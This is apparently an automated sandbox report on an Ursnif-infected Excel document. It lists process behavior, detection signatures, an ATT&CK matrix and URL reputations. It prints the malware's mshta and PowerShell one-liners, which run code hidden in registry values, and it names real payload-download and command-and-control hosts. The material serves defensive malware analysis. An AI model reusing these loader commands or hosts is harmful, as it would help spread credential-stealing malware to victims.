                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3155
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2839
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2541
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2100
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dllJump to dropped file
                  Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644Thread sleep count: 32 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644Thread sleep count: 49 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644Thread sleep count: 41 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644Thread sleep count: 38 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156Thread sleep time: -1667865539s >= -30000s
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156Thread sleep count: 62 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156Thread sleep count: 45 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156Thread sleep count: 88 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752Thread sleep count: 84 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752Thread sleep count: 56 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752Thread sleep count: 39 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724Thread sleep count: 2541 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 68Thread sleep count: 2100 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                  Source: Yara matchFile source: app.xml, type: SAMPLE
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E4454 cpuid
                  Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E6B0F HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E4C1B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                  Default AccountsNative API2Boot or Logon Initialization ScriptsProcess Injection12DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsExploitation for Client Execution4Logon Script (Windows)Logon Script (Windows)Masquerading1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion21NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptProcess Injection12LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 445916 Sample: documentation_39236.xlsb Startdate: 08/07/2021 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Found malware configuration 2->61 63 10 other signatures 2->63 7 EXCEL.EXE 30 41 2->7         started        12 iexplore.exe 1 59 2->12         started        14 mshta.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 53 free.mynowministries.com 162.241.253.78, 443, 49725, 49752 UNIFIEDLAYER-AS-1US United States 7->53 49 C:\Users\user\AppData\Local\...\app[1].dll, PE32 7->49 dropped 51 C:\Users\Public\Documents\decrypt.dll, PE32 7->51 dropped 69 Document exploit detected (creates forbidden files) 7->69 71 Document exploit detected (UrlDownloadToFile) 7->71 18 regsvr32.exe 7->18         started        21 regsvr32.exe 7->21         started        23 iexplore.exe 30 12->23         started        26 iexplore.exe 30 12->26         started        28 iexplore.exe 30 12->28         started        30 iexplore.exe 12->30         started        73 Suspicious powershell command line found 14->73 32 powershell.exe 14->32         started        35 iexplore.exe 31 16->35         started        37 powershell.exe 16->37         started        file5 signatures6 process7 dnsIp8 65 Writes or reads registry keys via WMI 18->65 67 Writes registry values via WMI 18->67 47 C:\Users\user\AppData\...\zctvvvtu.cmdline, UTF-8 32->47 dropped 39 conhost.exe 32->39         started        41 csc.exe 32->41         started        55 gtr.antoinfer.com 165.232.183.49, 49754, 49755, 49756 ALLEGHENYHEALTHNETWORKUS United States 35->55 43 conhost.exe 37->43         started        45 csc.exe 37->45         started        file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  3.2.regsvr32.exe.1e0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                  19.2.regsvr32.exe.fb0000.1.unpack100%AviraHEUR/AGEN.1108168Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  gtr.antoinfer.com8%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH0%Avira URL Cloudsafe
                  https://cdn.entity.0%URL Reputationsafe
                  https://cdn.entity.0%URL Reputationsafe
                  https://cdn.entity.0%URL Reputationsafe
                  https://cdn.entity.0%URL Reputationsafe
                  http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk0%Avira URL Cloudsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F0%Avira URL Cloudsafe
                  http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV0%Avira URL Cloudsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
                  http://gtr.antoinfer.com/favicon.ico0%Avira URL Cloudsafe
                  http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq0%Avira URL Cloudsafe
                  http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/0%Avira URL Cloudsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                  https://free.mynowministries.com/app.dll0%Avira URL Cloudsafe
                  http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx0%Avira URL Cloudsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare0%Avira URL Cloudsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://dataservice.o365filtering.com/0%URL Reputationsafe
